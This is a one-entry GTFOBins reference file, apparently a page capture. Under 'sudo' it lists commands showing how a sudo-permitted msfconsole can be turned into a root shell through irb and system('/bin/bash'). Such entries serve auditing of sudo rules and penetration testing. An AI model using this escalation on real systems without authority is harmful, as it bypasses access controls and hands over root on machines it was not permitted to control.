GTFOBins.github.io/_gtfobins/msfconsole.md

9 lines
115 B
Markdown
Raw Normal View History

2022-08-05 17:48:55 +02:00
---
functions:
sudo:
- code: |
sudo msfconsole
msf6 > irb
>> system("/bin/bash")
---